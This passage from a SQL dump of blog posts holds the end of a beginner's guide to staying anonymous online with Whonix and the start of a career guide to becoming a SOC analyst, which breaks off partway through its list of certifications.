leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Download Whonix</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Visit the <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.whonix.org/\">official Whonix website</a> and download the appropriate files for your system. Whonix is divided into two images: <b><strong class=\"font-bold\">Whonix-Gateway</strong></b> and <b><strong class=\"font-bold\">Whonix-Workstation</strong></b>. The Gateway handles all the Tor network interactions, while the Workstation is where you interact with applications.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Configure Your Virtual Machines</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Import the downloaded Whonix images into your virtualization software. Allocate sufficient resources (RAM and CPU) for both the Gateway and Workstation. Once set up, ensure that the Gateway directs all traffic through the Tor network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Secure Your Environment</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Update Whonix regularly to patch any vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Configure your browser (such as Tor Browser) within Whonix for a solid foundation of anonymity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Avoid installing unnecessary software or plugins that could compromise your security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Test for IP Leaks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once your setup is complete, use online tools like <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://ipleak.net\">IPLeak.net</a> to confirm that your real IP address is hidden and your traffic is routed exclusively through the Tor network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Stay Anonymized</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Never mix personal identity with your activities within Whonix.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid sharing personal information online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use encrypted communication tools to maintain privacy.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Staying Invisible Online</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Whonix is a powerful tool, maintaining online anonymity requires a combination of best practices and secure behavior.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong Passwords</strong></b>: Combine uppercase, lowercase, numbers, and special characters for all your passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Avoid Using Your Real Name</strong></b>: Create pseudonyms and temporary email addresses for online interactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Layer Your Privacy Tools</strong></b>: Combine Whonix with VPNs and encrypted communication tools for added security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Beware of Metadata</strong></b>: Files like images and documents contain metadata that may reveal your identity—strip metadata before sharing.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Limitations of Using Whonix</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Whonix is a game-changer, it\'s important to keep its limitations in mind.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Slower Speeds</strong></b>: Routing traffic through Tor can slow down your connection speeds compared to regular browsing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Learning Curve</strong></b>: Beginners may take a bit of time to fully understand and configure Whonix.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Not Foolproof</strong></b>: Human error, like revealing personal details or bypassing isolation protocols, can compromise your anonymity.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Becoming Invisible Online with Whonix</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix empowers individuals and organizations to stay anonymous and protect sensitive data in an increasingly surveilled digital world. Whether you\'re a privacy enthusiast or a cybersecurity learner, integrating Whonix into your online routine is a definitive step toward becoming invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But remember, tools like Whonix are only part of the solution. Online privacy demands vigilance, education, and a commitment to secure practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to take charge of your anonymity? Start your Whonix adventure today—because in the race for online privacy, protecting yourself isn’t optional; it’s essential.</p>', '', NULL, NULL, 1, 'draft', '2025-01-21 21:56:41', '2026-01-12 21:41:44', 'Information Security', 'How to Become Invisible on the Internet with Whonix', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(66, 'How to Become a SOC Analyst in 2025', 'how-to-become-a-soc-analyst-in-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re passionate about cybersecurity and eager to start an impactful career, becoming a Security Operations Center (SOC) Analyst might just be the perfect path for you. As the frequency and sophistication of cybersecurity threats continue to rise, businesses across the globe are looking for skilled professionals to protect their systems and data. SOC Analysts are on the frontlines of this battle, making it a rewarding and in-demand career choice.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This comprehensive guide provides all the details you need to map out your path to becoming a SOC Analyst, including key steps, essential skills, and practical tips that help you stand out in this sought-after field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a SOC Analyst?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A SOC Analyst plays the crucial role of monitoring, analyzing, and responding to security incidents within an organization’s network and systems. Acting as the first line of defense, SOC Analysts ensure that potential data breaches, malware infections, or other cyber risks are identified and addressed swiftly to protect the company from harm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Key responsibilities typically include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Monitoring security tools like SIEMs (Security Information and Event Management) to detect threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Performing in-depth analysis of security alerts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Responding to and escalating incidents as necessary.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Conducting security investigations and providing actionable insights.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Pursue a Career as a SOC Analyst?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are several reasons why pursuing a career as a SOC Analyst is a smart move in 2025:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">High Demand</strong></b>: The need for cybersecurity experts has never been greater. SOC Analysts play a critical role in safeguarding sensitive information, making them indispensable in every industry.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Competitive Salaries</strong></b>: SOC Analyst positions offer attractive salaries, with room for growth as you gain experience and expertise.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Rewarding Work</strong></b>: Protecting organizations from threats and knowing your work makes a tangible difference creates immense job satisfaction.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Career Growth</strong></b>: The role of SOC Analyst is often a stepping stone to advanced positions in cybersecurity, such as SOC Manager, Penetration Tester, or Security Architect.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10 Steps to Becoming a SOC Analyst</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 1: Build a Strong IT Foundation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you can tackle cybersecurity, it\'s essential to have a solid understanding of Information Technology (IT). Core areas to focus on include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hardware and software basics</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Networking fundamentals</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Operating systems (Windows, Linux, etc.)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Resources to kick-start your learning</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Paid</strong></b>: CBT Nuggets’ A+ Certification courses</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Google’s IT Support Certification</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Professor Messer’s IT videos on YouTube</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">TCM Security’s free \"Practical Help Desk\" course</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, hands-on experience is invaluable. Set up a home lab using affordable hardware, and help friends or family troubleshoot basic tech issues. These real-world exercises will sharpen your problem-solving abilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 2: Learn Networking</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Networking is the backbone of cybersecurity. A SOC Analyst must deeply understand how data flows through networks, how protocols operate, and how to analyze network traffic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Resources to learn networking</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Paid Options</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">CBT Nuggets’ Network+ or CCNA classes</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Google IT Support course (networking modules)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Professor Messer’s Network+ series on YouTube</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Cisco’s Networking Tutorials</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Activities like creating home network diagrams or using tools such as Packet Tracer and GNS3 for network simulations will strengthen your practical skills.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 3: Build Your Cybersecurity Knowledge</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve mastered IT and networking, it’s time to explore cybersecurity fundamentals. Aim to understand the key principles and practices for protecting systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Recommended Training</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Free Courses</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">ISC²\'s Certified Cybersecurity course</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Google’s Cybersecurity Specialization</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Cisco’s Junior Cybersecurity Analyst path</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Paid Options</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">CompTIA Security+ training from CBT Nuggets</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Free Security+ guides by Professor Messer on YouTube</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend about 4–6 months building a strong foundation in cybersecurity concepts before tackling advanced areas.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 4: Focus on SOC-Specific Fundamentals</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SOC Analysts require specific technical skills to excel in their roles, such as log analysis, alert handling, and expertise in tools like SIEMs and SOAR platforms.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Training Resources</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Splunk’s free courses and \"Boss of the SOC\" capture-the-flag challenges</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Microsoft SC-200 free modules</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Anti-siphon SOC Analyst pay-what-you-can training</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">TryHackMe’s and LetsDefend’s SOC-specific learning paths</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Affordable Options</strong></b>:</li>\r\n</ul>\r\n<ul>\r\n 	<li style=\"list-style-type: none\">\r\n<ul>\r\n 	<li class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">TCM Security\'s Junior SOC Analyst course</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These tools and techniques will prepare you to confidently monitor and respond to real-world security events.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 5: Gain Hands-On Experience</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practical experience is essential for understanding SOC Analyst responsibilities. Here’s how you can sharpen your skills:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Build a Home Lab</strong></b>: Install tools like VirtualBox or VMware to simulate real-world scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Practice Hacking</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Platforms like HackTheBox, TryHackMe, and Blue Team Labs offer immersive SOC-focused challenges and exercises.</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Volunteer Opportunities</strong></b>: Apply your growing skills by offering cybersecurity support to nonprofit organizations or small businesses.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 6: Earn Key Certifications</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications are vital to proving your expertise to employers. Start with beginner-level certs and gradually move to specialty certifications:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> (essential foundation)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 